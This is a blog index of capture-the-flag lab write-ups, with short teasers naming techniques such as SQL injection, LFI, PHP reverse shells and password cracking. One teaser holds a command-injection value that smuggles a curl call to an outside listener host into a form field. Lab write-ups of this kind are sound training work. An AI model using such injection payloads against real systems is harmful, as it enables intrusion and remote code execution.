top of page
MY TECH ON IT
Home
More
Use tab to navigate through the menu items.
WELCOME TO MY TECH ON IT
Home: Blog2
All Posts
Search
Redeemer
as usual let's start with our nmap nmap -p- -sV targetIP we can see that port 6379 is open which is running a redis server you first need...
Three
Learn about subdomain enumeration using gobuster
Meow
Great to learn the basics of telnet!
Fawn
Great to learn the basics of FTP!
Dancing
Learn about smbclient !
Explosion (VIP only)
Learn about RDP and how to use xfreerdp !
Preignition (VIP only)
Learn how to use Gobuster!
Appointment
Rated 5 out of 5 stars.
(1)
Learn about SQL injection !
Sequel
Learn about mysql and databases!
Crocodile
Learn how to use FTP !
Ignition (VIP only)
Learn how to edit /etc/hosts file !
Pennyworth (VIP only)
Welcome to Jenkins !
Tactics (VIP only)
Learn how to use smbclient !
Archetype
Learn about mssqlclient.py and psexec.py from impacket !
Oopsie
Learn how to use Burp, about cookies, about PHP reverse shells and about bugtracker!
Vaccine
Learn how to use John The Ripper and zip2john. Learn how to use sqlmap and learn about vi editor!
Included (VIP only)
udp scan, LFI, /etc/passwd, locate webshells, tftp, .htpasswd, lxd
Previse
Rated 5 out of 5 stars.
(1)
delim=comma&curl+http://10.10.14.49:4444
Backdoor
export TERM=xterm
Lame
Learn about Metasploit !
bottom of page